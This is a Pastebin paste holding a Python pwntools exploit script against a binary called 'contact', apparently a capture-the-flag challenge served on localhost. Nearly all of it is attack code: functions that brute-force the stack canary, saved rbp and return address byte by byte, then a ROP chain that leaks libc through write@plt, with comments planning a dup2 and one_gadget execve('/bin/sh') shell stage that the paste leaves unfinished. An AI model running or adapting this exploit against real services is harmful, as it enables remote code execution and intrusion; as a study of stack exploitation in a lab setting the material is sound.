SHARE
TWEET

Untitled

a guest Sep 15th, 2019 101 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. # -*- coding: utf-8 -*-
  3. from pwn import *
  4. from struct import pack
  5.  
  6. exe = context.binary = ELF('contact')
  7. libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  8.  
  9. host = args.HOST or '127.0.0.1'
  10. port = int(args.PORT or 1337)
  11.  
  12. def remote(argv=[], *a, **kw):
  13.     '''Connect to the process on the remote host'''
  14.     io = connect(host, port)
  15.     return io
  16.  
  17. def start(argv=[], *a, **kw):
  18.     '''Start the exploit against the target.'''
  19.     return remote(argv, *a, **kw)
  20.  
  21.  
  22. # Bruteforce an 8-byte rbp register
  23. def bruteforce(payload):
  24.     ret = ''
  25.  
  26.     context.log_level = 'error'            
  27.     for b in range(8):
  28.         for v in range(256):
  29.             io = start()
  30.             io.recvline()
  31.             dummy = ret + chr(v)
  32.             io.send(payload + dummy)
  33.  
  34.             try:
  35.                 result = io.recvline()
  36.                 ret = dummy
  37.                 print "bytes: " + hex(u64(ret.ljust(8, '\x00')))
  38.                 break
  39.             except:
  40.                 continue
  41.             finally:
  42.                 io.close()
  43.    
  44.     context.log_level = 'info'
  45.     return ret
  46.  
  47. # Bruteforce an 8-byte canary (technically on 7, because first byte is \x00)
  48. def bruteforce_canary(payload):
  49.     canary = '\x00'
  50.  
  51.     context.log_level = 'error'
  52.     for b in range(7):
  53.        
  54.         for v in range(256):  
  55.             io = start()
  56.        
  57.             io.recvline()
  58.  
  59.             dummy = canary + chr(v)
  60.  
  61.             # If the byte is correct Done. will be returned
  62.             io.send(payload + dummy)
  63.  
  64.             try:
  65.                 result = io.recvline()
  66.                 canary = dummy
  67.                 print "canary: " + hex(u64(canary.ljust(8, '\x00')))
  68.                 break
  69.             except:
  70.                 continue
  71.             finally:
  72.                 io.close()
  73.  
  74.     context.log_level = 'info'
  75.    
  76.     return canary
  77. # Use this one_gadget and not write manual ROP chains
  78. # 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
  79. # constraints:
  80. #   rcx == NULL
  81.  
  82. # -- Exploit goes here --
  83.  
  84. # Plan of action:
  85. # Using fd
  86. # First fill stack with stuff up to address 0x38
  87. # Bruteforce the 8-byte canary starting with \x00
  88. # Bruteforce the 8-byte rbp starting with \x7f (or potentially \x7d or \x7e so bruteforce an extra 2 bits)
  89. # Bruteforce the 8-byte return address (according to will should begin with a 55 or 56)
  90.  
  91. # ROP Chain:
  92. # Get .text base by subtracting the return address with its offset in the ELF binary
  93. # leak libc using write@plt(4, write@got, 8)
  94. # Get libc base by subtracting the offset from write in libc ELF binary
  95. # Get dup2's address
  96.  
  97. payload = fit({}, length=0x38)
  98.  
  99. # Brute force canary
  100. # canary = bruteforce_canary(payload)
  101. canary = p64(0x2e51750513e03a00)
  102. log.info('final canary: ' + hex(u64(canary)))
  103. payload += canary
  104.  
  105. # Brute force rbp
  106. # rbp = bruteforce(payload)
  107. rbp = p64(0x7ffd889dae00)
  108. log.info('final rbp: ' + hex(u64(rbp)))
  109. payload += rbp
  110.  
  111. # Brute force return address
  112. # ret = bruteforce(payload)
  113. ret = p64(0x55fdc4aee502)
  114. log.info('final ret: ' + hex(u64(ret)))
  115.  
  116. # Get .text base
  117. text_base = u64(ret) - 0x14ee # 14ee is the address of the function that is being returned to
  118. exe.address = text_base
  119. log.info('.text begins at ' + hex(text_base))
  120.  
  121. payload += p64(exe.address + 0x00001562) # Jump to finish the vulnerable function
  122.  
  123. # Leak libc by calling write@plt(4, write@got, 8)
  124. rop1 = ROP(exe)
  125. rop1.call(exe.plt.write, [4, exe.got.write, 8])
  126. log.info('write@plt(4, write@got, 8):\n' + rop1.dump())
  127. payload += rop1.chain()
  128.  
  129. io = start()
  130.  
  131. io.recvline()
  132.  
  133. io.send(payload)
  134.  
  135. io.recvline()
  136.  
  137. io.interactive()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top